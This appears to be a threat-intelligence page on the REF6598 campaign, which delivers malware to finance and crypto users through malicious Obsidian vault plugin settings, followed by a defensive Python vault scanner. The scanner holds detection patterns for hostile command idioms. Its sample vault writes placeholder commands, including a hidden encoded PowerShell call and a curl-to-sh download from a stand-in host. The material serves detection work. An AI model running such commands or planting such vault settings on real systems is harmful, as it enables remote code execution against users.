
REF6598 Obsidian social-engineering campaign targeting finance and crypto users

Campaign · H score 39 · 1 unique source, 1 article

Summary


The REF6598 operation uses LinkedIn, Telegram, and Obsidian to deliver PHANTOMPULSE, giving the operators a targeted intrusion path into financial and cryptocurrency users on Windows and macOS. Targets are approached as if by a venture capital firm, then moved into a Telegram group that adds false legitimacy and steers them toward a shared cloud-hosted vault. Once a victim enables Installed community plugins, the malicious vault configuration can execute code through the Shell Commands plugin and hide interface elements with the Hider plugin. The campaign matters because it turns a trusted note-taking app into a channel for malware delivery and remote control without relying on a traditional software exploit: the execution primitive is a legitimate plugin feature driven by attacker-supplied vault settings.

Related Happenings

UNC1069 open-source maintainer social-engineering campaign

Campaign
First: 04.04.2026 23:30 Last: 04.04.2026 23:30 Sources 1

About this happening: UNC1069's **coordinated social-engineering campaign** against **Node.js and npm maintainers** has widened, with multiple developers reporting the same lure pattern and the potenti...

Latest development: 06.04.2026 23:55

Security researcher Taylor Monahan and Socket reported that members of the open source software community, including Socket engineers and CEO Feross Aboukhadijeh, were targeted by the same slow-burn LinkedIn, Slack, and Microsoft Teams social engineering playbook used against Axios maintainer Jason Saayman, indicating the campaign was wider than a single Axios compromise.

Storm infostealer server-side decryption activity

Malware Activity
First: 02.04.2026 17:15 Last: 02.04.2026 17:15 Sources 1

About this happening: The **Storm** infostealer now steals **browser credentials**, **session cookies**, and **crypto wallets** and forwards them to attacker infrastructure for **server-side decryption...

VenomStealer ecosystem shift changes threat-actor operations

Threat Actor Meta
First: 31.03.2026 17:51 Last: 31.03.2026 17:51 Sources 1

About this happening: **VenomStealer** is being run as a **licensed underground service** with an **affiliate program**, shifting it from a single malware kit into a repeatable operator ecosystem that...

Ghost campaign remote access trojan payload

Malware Activity
First: 24.03.2026 16:30 Last: 24.03.2026 16:30 Sources 1

About this happening: A malicious **npm** payload tied to the **Ghost campaign** began in **early February** and used **fake installation logs** to hide a **remote access trojan (RAT)** that could stea...

Contagious Interview cryptocurrency social-engineering and malware-delivery campaign

Campaign
First: 23.03.2026 20:09 Last: 23.03.2026 20:09 Sources 1

About this happening: A **North Korean** cluster behind **Contagious Interview / WaterPlum** is running a coordinated **malware campaign** against **cryptocurrency professionals**, increasing the risk...

Timeline

  1. 16.04.2026 14:02 · 2 articles

    REF6598 Obsidian social engineering campaign disclosed

    Initial Disclosure

    Elastic Security Labs disclosed REF6598, a social engineering campaign targeting individuals in the financial and cryptocurrency sectors through LinkedIn and Telegram. The operation steers victims to a cloud-hosted Obsidian vault, where enabling Installed community plugins lets malicious configuration trigger the Shell Commands and Hider plugins; on Windows it drops PHANTOMPULL and loads PHANTOMPULSE in memory, while on macOS it uses an obfuscated AppleScript dropper with Telegram-based fallback C2 resolution. The intrusion was detected and blocked before the operators achieved their goals.
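The summary and the disclosure above both describe the same tradecraft: a vault's own configuration registers shell commands that run through the Shell Commands plugin, while Hider suppresses the interface elements that would reveal it. A responder who receives a suspicious vault therefore wants to inspect the `.obsidian/` settings rather than the notes. The scanner below is an added example written for this page; it is not code from Elastic Security Labs or from the Obsidian project. It assumes the plugin IDs `obsidian-shellcommands` and `obsidian-hider`, the `community-plugins.json` list of enabled plugin IDs, and the `data.json` layouts shown in the comments (a `shell_commands` list with per-platform command strings and an `events` map; `hide*` booleans for Hider). Those field names are assumptions about the plugins' settings files and may need adjusting to the versions you encounter. The sample vault it builds is constructed, with placeholder commands rather than real payloads.

```python
import json
import re
import tempfile
from pathlib import Path

# Plugin IDs and data.json field names below are this example's assumptions about
# the two community plugins' settings files, not taken from the report.
SHELLCMD_ID = "obsidian-shellcommands"
HIDER_ID = "obsidian-hider"

# Substrings in a registered command that justify a closer look (not exhaustive).
SUSPICIOUS = [re.compile(p, re.IGNORECASE) for p in (
    r"powershell.*-(enc|encodedcommand)\b",
    r"curl\b.*\|\s*(ba)?sh\b",
    r"osascript",
    r"certutil.*-urlcache",
    r"base64\s+(-d|--decode)",
    r"\biex\b|invoke-expression",
)]


def load_json(path: Path):
    """Return parsed JSON, or None if the file is missing or malformed."""
    try:
        return json.loads(path.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return None


def iter_shell_commands(data):
    """Yield (command_id, platform, command, auto_events) from Shell Commands settings.
    Assumed layout: a 'shell_commands' list whose entries carry either a
    'platform_specific_commands' dict or a legacy 'shell_command' string, plus an
    'events' dict whose enabled entries fire without the user clicking anything."""
    for entry in (data or {}).get("shell_commands", []):
        auto = sorted(name for name, ev in entry.get("events", {}).items()
                      if isinstance(ev, dict) and ev.get("enabled"))
        cmds = entry.get("platform_specific_commands") or {}
        if not cmds and entry.get("shell_command"):
            cmds = {"default": entry["shell_command"]}
        for platform, cmd in cmds.items():
            if cmd:
                yield entry.get("id", "?"), platform, cmd, auto


def scan_vault(vault: str) -> dict:
    """Score a vault: event-triggered shell commands plus a UI-hiding plugin is the
    combination described for REF6598."""
    cfg = Path(vault) / ".obsidian"
    enabled = set(load_json(cfg / "community-plugins.json") or [])
    out = {"enabled_plugins": sorted(enabled), "shell_commands": [], "hidden_ui": [], "score": 0}
    if SHELLCMD_ID in enabled:
        data = load_json(cfg / "plugins" / SHELLCMD_ID / "data.json")
        for cid, platform, cmd, auto in iter_shell_commands(data):
            hits = [p.pattern for p in SUSPICIOUS if p.search(cmd)]
            out["shell_commands"].append(
                {"id": cid, "platform": platform, "command": cmd, "auto_events": auto, "hits": hits})
            out["score"] += 1 + (2 if auto else 0) + (3 if hits else 0)
    if HIDER_ID in enabled:
        data = load_json(cfg / "plugins" / HIDER_ID / "data.json") or {}
        out["hidden_ui"] = sorted(k for k, v in data.items() if k.startswith("hide") and v is True)
        if out["hidden_ui"] and out["shell_commands"]:
            out["score"] += 2  # concealment and execution together: the REF6598 pattern
    return out


def build_sample_vault(root: str, malicious: bool) -> str:
    """Write a constructed vault config under root (placeholder commands, not real payloads)."""
    cfg = Path(root) / ".obsidian"
    (cfg / "plugins" / SHELLCMD_ID).mkdir(parents=True)
    (cfg / "plugins" / HIDER_ID).mkdir(parents=True)
    if not malicious:
        (cfg / "community-plugins.json").write_text("[]")
        return root
    (cfg / "community-plugins.json").write_text(json.dumps([SHELLCMD_ID, HIDER_ID]))
    (cfg / "plugins" / SHELLCMD_ID / "data.json").write_text(json.dumps({"shell_commands": [{
        "id": "sync", "platform_specific_commands": {
            "win32": "powershell -w hidden -enc AAAA",
            "darwin": "osascript -e 'do shell script \"curl https://example.invalid/s | sh\"'"},
        "events": {"after-obsidian-starts": {"enabled": True}}}]}))
    (cfg / "plugins" / HIDER_ID / "data.json").write_text(
        json.dumps({"hideRibbon": True, "hideStatus": True, "hideTabs": False}))
    return root


def demo(malicious: bool = True) -> dict:
    """Build the constructed vault in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_vault(build_sample_vault(tmp, malicious))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it against a real vault with `scan_vault("/path/to/vault")`. The score is deliberately simple: any registered shell command counts, an event trigger (runs without user interaction) counts more, a known download-and-execute idiom counts most, and the Hider pairing adds a final bump. A high score is a reason to pull the vault for analysis, not proof of compromise; a legitimate user of Shell Commands will also register commands, so the decisive signals are the event trigger, the command content, and whether the vault arrived from someone else.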
